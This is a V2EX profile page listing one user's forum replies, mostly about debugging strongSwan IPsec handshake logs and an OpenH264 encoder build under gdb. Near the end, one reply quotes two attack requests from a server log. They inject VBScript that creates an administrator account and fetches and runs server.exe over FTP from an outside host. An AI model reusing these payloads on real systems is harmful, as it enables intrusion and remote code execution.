V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  feast  ›  全部回复第 19 页 / 共 22 页
回复总数  435
1 ... 11  12  13  14  15  16  17  18  19  20 ... 22  
2018-10-05 23:59:37 +08:00
回复了 feast 创建的主题 程序员 有没有什么比较好的工具用来解析 IPSec 的 ISAKMP 握手包
@Seumi 老兄非常感谢你的热心回复,但是你针对的是 traffic 阶段的 ESP 封包解密,但是我的意思是获取 ISKAMP 阶段 AH 封包的配置信息,AH 包是不加密的,是用来握手的
2018-10-05 23:56:25 +08:00
回复了 feast 创建的主题 程序员 有没有什么比较好的工具用来解析 IPSec 的 ISAKMP 握手包
@Seumi
Sep 16 22:28:10 05[ENC] <1> 0: 00 E9 42 94 E0 01 A5 09 2A 2D 7D 6A 6B 3A 3B E0 ..B.....*-}jk:;.
Sep 16 22:28:10 05[ENC] <1> 16: 0C 52 8E 36 .R.6
Sep 16 22:28:10 05[ENC] <1> parsing NOTIFY payload finished
Sep 16 22:28:10 05[ENC] <1> verifying payload of type NOTIFY
Sep 16 22:28:10 05[ENC] <1> NOTIFY payload verified, adding to payload list
Sep 16 22:28:10 05[ENC] <1> starting parsing a NOTIFY payload
Sep 16 22:28:10 05[ENC] <1> parsing NOTIFY payload, 28 bytes left
Sep 16 22:28:10 05[ENC] <1> parsing payload from => 28 bytes @ 0x7f1b18000cd0
Sep 16 22:28:10 05[ENC] <1> 0: 00 00 00 1C 00 00 40 05 AA E4 23 F4 5C 23 FF 4C ......@...#.\#.L
Sep 16 22:28:10 05[ENC] <1> 16: 81 C6 D7 CA 06 A8 71 7D AB 0F 6C 3D ......q}..l=
Sep 16 22:28:10 05[ENC] <1> parsing rule 0 U_INT_8
Sep 16 22:28:10 05[ENC] <1> => 0
Sep 16 22:28:10 05[ENC] <1> parsing rule 1 FLAG
Sep 16 22:28:10 05[ENC] <1> => 0
Sep 16 22:28:10 05[ENC] <1> parsing rule 2 RESERVED_BIT
Sep 16 22:28:10 05[ENC] <1> => 0
Sep 16 22:28:10 05[ENC] <1> parsing rule 3 RESERVED_BIT
Sep 16 22:28:10 05[ENC] <1> => 0
Sep 16 22:28:10 05[ENC] <1> parsing rule 4 RESERVED_BIT
Sep 16 22:28:10 05[ENC] <1> => 0
Sep 16 22:28:10 05[ENC] <1> parsing rule 5 RESERVED_BIT
Sep 16 22:28:10 05[ENC] <1> => 0
Sep 16 22:28:10 05[ENC] <1> parsing rule 6 RESERVED_BIT
Sep 16 22:28:10 05[ENC] <1> => 0
Sep 16 22:28:10 05[ENC] <1> parsing rule 7 RESERVED_BIT
Sep 16 22:28:10 05[ENC] <1> => 0
Sep 16 22:28:10 05[ENC] <1> parsing rule 8 RESERVED_BIT
Sep 16 22:28:10 05[ENC] <1> => 0
Sep 16 22:28:10 05[ENC] <1> parsing rule 9 PAYLOAD_LENGTH
Sep 16 22:28:10 05[ENC] <1> => 28
Sep 16 22:28:10 05[ENC] <1> parsing rule 10 U_INT_8
Sep 16 22:28:10 05[ENC] <1> => 0
Sep 16 22:28:10 05[ENC] <1> parsing rule 11 SPI_SIZE
Sep 16 22:28:10 05[ENC] <1> => 0
Sep 16 22:28:10 05[ENC] <1> parsing rule 12 U_INT_16
Sep 16 22:28:10 05[ENC] <1> => 16389
Sep 16 22:28:10 05[ENC] <1> parsing rule 13 SPI
Sep 16 22:28:10 05[ENC] <1> => 0 bytes @ (nil)
Sep 16 22:28:10 05[ENC] <1> parsing rule 14 CHUNK_DATA
Sep 16 22:28:10 05[ENC] <1> => 20 bytes @ 0x7f1b100023c0
Sep 16 22:28:10 05[ENC] <1> 0: AA E4 23 F4 5C 23 FF 4C 81 C6 D7 CA 06 A8 71 7D ..#.\#.L......q}
Sep 16 22:28:10 05[ENC] <1> 16: AB 0F 6C 3D ..l=
Sep 16 22:28:10 05[ENC] <1> parsing NOTIFY payload finished
Sep 16 22:28:10 05[ENC] <1> verifying payload of type NOTIFY
Sep 16 22:28:10 05[ENC] <1> NOTIFY payload verified, adding to payload list
Sep 16 22:28:10 05[ENC] <1> process payload of type SECURITY_ASSOCIATION
Sep 16 22:28:10 05[ENC] <1> process payload of type KEY_EXCHANGE
Sep 16 22:28:10 05[ENC] <1> process payload of type NONCE
Sep 16 22:28:10 05[ENC] <1> process payload of type NOTIFY
Sep 16 22:28:10 05[ENC] <1> process payload of type NOTIFY
Sep 16 22:28:10 05[ENC] <1> verifying message structure
Sep 16 22:28:10 05[ENC] <1> found payload of type NOTIFY
Sep 16 22:28:10 05[ENC] <1> found payload of type NOTIFY
Sep 16 22:28:10 05[ENC] <1> found payload of type SECURITY_ASSOCIATION
Sep 16 22:28:10 05[ENC] <1> found payload of type KEY_EXCHANGE
Sep 16 22:28:10 05[ENC] <1> found payload of type NONCE
Sep 16 22:28:10 05[ENC] <1> parsed IKE_SA_INIT request 0 [ SA KE No N(NATD_S_IP) N(NATD_D_IP) ]
Sep 16 22:28:10 05[CFG] <1> looking for an ike config for 172.21.241.94...220.166.51.91
Sep 16 22:28:10 05[IKE] <1> no IKE config found for 172.21.241.94...220.166.51.91, sending NO_PROPOSAL_CHOSEN
Sep 16 22:28:10 05[ENC] <1> added payload of type NOTIFY to message
Sep 16 22:28:10 05[ENC] <1> order payloads in message
Sep 16 22:28:10 05[ENC] <1> added payload of type NOTIFY to message
Sep 16 22:28:10 05[ENC] <1> generating IKE_SA_INIT response 0 [ N(NO_PROP) ]
Sep 16 22:28:10 05[ENC] <1> not encrypting payloads

这种已经够详细了吧,但是还是看不出客户端到底用的什么加密,什么 HASH 和什么 FPS 模式
2018-10-05 23:51:17 +08:00
回复了 feast 创建的主题 程序员 有没有什么比较好的工具用来解析 IPSec 的 ISAKMP 握手包
```
Sep 16 22:28:10 05[MGR] checkout IKEv2 SA by message with SPIs 53be4aebeab9737c_i 0000000000000000_r
Sep 16 22:28:10 05[MGR] created IKE_SA (unnamed)[1]
Sep 16 22:28:10 05[NET] <1> received packet: from 119.77.23.12[500] to 172.21.241.94[500] (300 bytes)
Sep 16 22:28:10 05[ENC] <1> parsing body of message, first payload is SECURITY_ASSOCIATION
Sep 16 22:28:10 05[ENC] <1> starting parsing a SECURITY_ASSOCIATION payload
Sep 16 22:28:10 05[ENC] <1> parsing SECURITY_ASSOCIATION payload, 272 bytes left
Sep 16 22:28:10 05[ENC] <1> parsing payload from => 272 bytes @ 0x7f1b18000bdc
Sep 16 22:28:10 05[ENC] <1> 0: 22 00 00 2C 00 00 00 28 01 01 00 04 03 00 00 08 "..,...(........
Sep 16 22:28:10 05[ENC] <1> 16: 01 00 00 03 03 00 00 08 03 00 00 02 03 00 00 08 ................
Sep 16 22:28:10 05[ENC] <1> 32: 02 00 00 02 00 00 00 08 04 00 00 02 28 00 00 88 ............(...
Sep 16 22:28:10 05[ENC] <1> 48: 00 02 00 00 BD 44 15 33 19 42 FC 3E 48 26 C4 EE .....D.3.B.>H&..
Sep 16 22:28:10 05[ENC] <1> 64: 9E 03 ED F1 86 32 6F CB 18 56 8E E3 6E 59 2F 46 .....2o..V..nY/F
Sep 16 22:28:10 05[ENC] <1> 80: 7D 93 71 FF C1 8B AD 1E FA D4 4A 42 04 ED D0 67 }.q.......JB...g
Sep 16 22:28:10 05[ENC] <1> 96: 9F 51 55 F0 3B ED 25 E1 FC D0 82 46 84 39 E1 1A .QU.;.%....F.9..
Sep 16 22:28:10 05[ENC] <1> 112: 86 ED 85 57 96 B8 4F 08 F9 85 A8 30 D6 35 93 C7 ...W..O....0.5..
Sep 16 22:28:10 05[ENC] <1> 128: 27 61 21 2C 20 80 7D A0 8C 15 1A 32 10 1A BB A8 'a!, .}....2....
Sep 16 22:28:10 05[ENC] <1> 144: 7B 36 93 63 3B 05 A1 EC DD 36 27 6F E7 02 25 5E {6.c;....6'o..%^
Sep 16 22:28:10 05[ENC] <1> 160: E4 BC 3C CC 72 FB 33 11 44 7F 90 61 C2 82 2B EE ..<.r.3.D..a..+.
Sep 16 22:28:10 05[ENC] <1> 176: 37 4B 6B E1 29 00 00 24 51 0F C8 1E A1 9A B5 E3 7Kk.)..$Q.......
Sep 16 22:28:10 05[ENC] <1> 192: 41 12 8B E3 32 12 AD 58 A2 B4 E9 9E 3D 9E 3A D3 A...2..X....=.:.
Sep 16 22:28:10 05[ENC] <1> 208: B6 88 EE 59 78 C5 69 8A 29 00 00 1C 00 00 40 04 ...Yx.i.).....@.
Sep 16 22:28:10 05[ENC] <1> 224: 00 E9 42 94 E0 01 A5 09 2A 2D 7D 6A 6B 3A 3B E0 ..B.....*-}jk:;.
Sep 16 22:28:10 05[ENC] <1> 240: 0C 52 8E 36 00 00 00 1C 00 00 40 05 AA E4 23 F4 .R.6......@...#.
Sep 16 22:28:10 05[ENC] <1> 256: 5C 23 FF 4C 81 C6 D7 CA 06 A8 71 7D AB 0F 6C 3D \#.L......q}..l=
Sep 16 22:28:10 05[ENC] <1> parsing rule 0 U_INT_8
Sep 16 22:28:10 05[ENC] <1> => 34
Sep 16 22:28:10 05[ENC] <1> parsing rule 1 FLAG
Sep 16 22:28:10 05[ENC] <1> => 0
Sep 16 22:28:10 05[ENC] <1> parsing rule 2 RESERVED_BIT
Sep 16 22:28:10 05[ENC] <1> => 0
Sep 16 22:28:10 05[ENC] <1> parsing rule 3 RESERVED_BIT
Sep 16 22:28:10 05[ENC] <1> => 0
Sep 16 22:28:10 05[ENC] <1> parsing rule 4 RESERVED_BIT
Sep 16 22:28:10 05[ENC] <1> => 0
Sep 16 22:28:10 05[ENC] <1> parsing rule 5 RESERVED_BIT
Sep 16 22:28:10 05[ENC] <1> => 0
Sep 16 22:28:10 05[ENC] <1> parsing rule 6 RESERVED_BIT
Sep 16 22:28:10 05[ENC] <1> => 0
Sep 16 22:28:10 05[ENC] <1> parsing rule 7 RESERVED_BIT
Sep 16 22:28:10 05[ENC] <1> => 0
Sep 16 22:28:10 05[ENC] <1> parsing rule 8 RESERVED_BIT
Sep 16 22:28:10 05[ENC] <1> => 0
Sep 16 22:28:10 05[ENC] <1> parsing rule 9 PAYLOAD_LENGTH
Sep 16 22:28:10 05[ENC] <1> => 44
Sep 16 22:28:10 05[ENC] <1> parsing rule 10 (1258)

```
2018-10-05 23:43:12 +08:00
回复了 feast 创建的主题 程序员 有没有什么比较好的工具用来解析 IPSec 的 ISAKMP 握手包
@Seumi SKYSEED 是什么,另外我已经把 STRONGSWAN 的日志级别调成 7 了依然没用,出来的数据看不到 JUNIPER 官方说的那几种参数
2018-10-05 23:41:44 +08:00
回复了 feast 创建的主题 程序员 有没有什么比较好的工具用来解析 IPSec 的 ISAKMP 握手包
@mason961125 很抱歉你这办法我似乎已经用过了,输出的日志就是看不到,Juniper 官方说至少要这些东西互相匹配才行,日志里似乎是看不到的

If phase 2 negotiation has been initiated, and you get the "Error = NO_PROPOSAL_CHOSEN" message, this indicates a mismatch in proposals between the two peers. The phase 2 proposal elements include the following:

Authentication algorithm (MD5, SHA1)
Encryption algorithm (DES, 3DES, AES128, AES192, AES256)
Lifetime kilobytes (sometimes referred to as lifesize)
Lifetime seconds
Protocol (AH, ESP)
Perfect Forward Secrecy (Diffie-Hellman group1, group2, group5)
If phase 2 fails to complete with an error in proposal, then confirm that remote peer has at least one proposal configured in which Authentication and Encryption algorithms, Protocol and Perfect Forward Secrecy (PFS) match at least one proposal on the local side. A common mis-configuration is PFS group key mismatch. Perhaps one side has PFS group key configured whereas the remote side may either not have PFS enabled or incorrect group key. Also, with some third-party non-Juniper devices, Lifetime in both kilobytes and/or seconds may also need to match.
2018-05-04 13:19:23 +08:00
回复了 CatSama 创建的主题 云计算 IDCF 必须要日本本国人或者在日留学生才能注册?
要必要吗?弄个梯子折腾成这样,搬 WA 工,CLOUDCONE,digitalocean 哪个买起不是几分钟的事
能用专网为啥要选公网?
2018-03-05 11:23:34 +08:00
回复了 feast 创建的主题 程序员 C 程序单步调试问题
@MCVector CISCO 很早就强调了只对他的 binary 负责,这个注意到的,不然也不会想办法去调用 dll 了
2018-03-05 11:22:35 +08:00
回复了 feast 创建的主题 程序员 C 程序单步调试问题
@pkookp8 谢谢。我再研究下这个 Int 的问题
2018-03-04 12:22:19 +08:00
回复了 feast 创建的主题 程序员 C 程序单步调试问题
@pkookp8 首先我说下基本情况,我是在网上找的一份别人写的,应该是用于 Linux 系统的代码,我对其做了部分修改,在 windows 下使用 mingw 工具编译通过,执行后只能够生成 0 字节的 Output.264,至于源文件,win 下应该不存在权限问题吧,现在不知道为啥已经把各种参数都已经传递给 pEncoder 了,然而根本程序就没有实际编码操作,如何 debug?毫无头绪,gdb 根本就反馈的不是一个错误,之前有看到 incorrect parameters passed to C runtime,难道是 MSVC 不兼容 Linux 下的语法?表示作为非程序员专业,修改压力很大
2018-03-04 12:16:16 +08:00
回复了 feast 创建的主题 程序员 C 程序单步调试问题
@MCVector 有没有相关 code? github 分享一下? YUV 输入的就可以了
2018-03-04 12:15:42 +08:00
回复了 feast 创建的主题 程序员 C 程序单步调试问题
@ysc3839 ooops,当然需要修改一部分来适应 MSVC runtime
2018-03-04 12:14:57 +08:00
回复了 feast 创建的主题 程序员 C 程序单步调试问题
@zhuangzhuang1988 我尝试下用 VS 吧,GUN CLI 实在有点蛋疼,特别是对于我这种主业不是 coding 的
2018-03-04 12:14:06 +08:00
回复了 feast 创建的主题 程序员 C 程序单步调试问题
@wevsty 23
~~~
printf("WelsCreateSVCEncoder:%d\n",ret);
(gdb)
WelsCreateSVCEncoder:0
24 param.iPicHeight=inputheight;
(gdb)
25 param.iPicWidth=inputwidth;
(gdb)
26 param.fMaxFrameRate=25;
(gdb)
27 param.iUsageType=CAMERA_VIDEO_REAL_TIME;
(gdb)
28 param.iTargetBitrate = 1000000;
(gdb)
29 ret=(*pEncoder)->Initialize(pEncoder,&param);
(gdb)
0x7406acb0 in gmpopenh264!WelsDestroySVCEncoder ()
from G:\h264enc\openh264.dll
0x7409c060 in gmpopenh264!WelsCreateDecoder () from G:\h264enc\gmpopenh264.dll
(gdb)
Single stepping until exit from function openh264!WelsCreateDecoder,
which has no line number information.
~~~
这是 gdb 的单步输出,再往下执行直接就退出了,跟直接执行程序结果不一样
2018-03-03 22:59:10 +08:00
回复了 feast 创建的主题 程序员 C 程序单步调试问题
@zhuangzhuang1988 我的错,想省事直接用 linux 原生代码,没法解决的话明天看看能不能移植到 VS 上去编译吧………
2018-03-03 22:48:04 +08:00
回复了 feast 创建的主题 程序员 C 程序单步调试问题
@razerhell 你可以直接保存代码用 gcc 链接思科发布的 dll 编译看看,难道这份代码只能 linux 下用
2018-03-03 22:46:16 +08:00
回复了 feast 创建的主题 程序员 C 程序单步调试问题
@razerhell 应该不是,fsink 指针可以成功生成 0 字节的目标文件,问题是看不到动态调用 dll 的过程,之前解决一些跨平台编译的语法问题还能行,碰到内部执行的毫无头绪了
2018-03-03 22:14:00 +08:00
回复了 feast 创建的主题 程序员 C 程序单步调试问题
程序直接执行后 输出
```
WelsCreateSVCEncoder:0
Initialize:0
```
每个人每个村都分配一个 IPV6 地址都够
shit,怎么不正常,干脆直接贴
10:21:58 222.186.57.27:1682 请求 GET /?search={.save|1.vbs|a=replace("Set*o=CreateObject(""Shell.Users""):Set*z=o.create(""IDC_witkey""):z.changePassword*""zxc123..."","""":z.setting(""AccountType"")=3","*",Chr(32)):Execute(a):CreateObject("Scripting.FileSystemObject").GetFile(WScript.ScriptFullName).Delete.}
10:22:46 222.186.57.27:2013 请求 GET /?search={.save|cmd.vbs|a=replace("set*objShell=wscript.createObject(""wscript.shell""):objShell.Run(""cmd.exe*/c*echo*open*d.lengyue.win*>1.txt*&&*echo*123*>>1.txt*&&*echo*123*>>1.txt*&&*echo*get*server.exe*>>1.txt*&&*echo*bye*>>1.txt*&&*ftp*-s:1.txt*&&*server.exe""):wscript.quit","*",Chr(32)):Execute(a).
1 ... 11  12  13  14  15  16  17  18  19  20 ... 22  
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1101 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 21ms · UTC 18:59 · PVG 02:59 · LAX 10:59 · JFK 13:59
Developed with CodeLauncher
♥ Do have faith in what you're doing.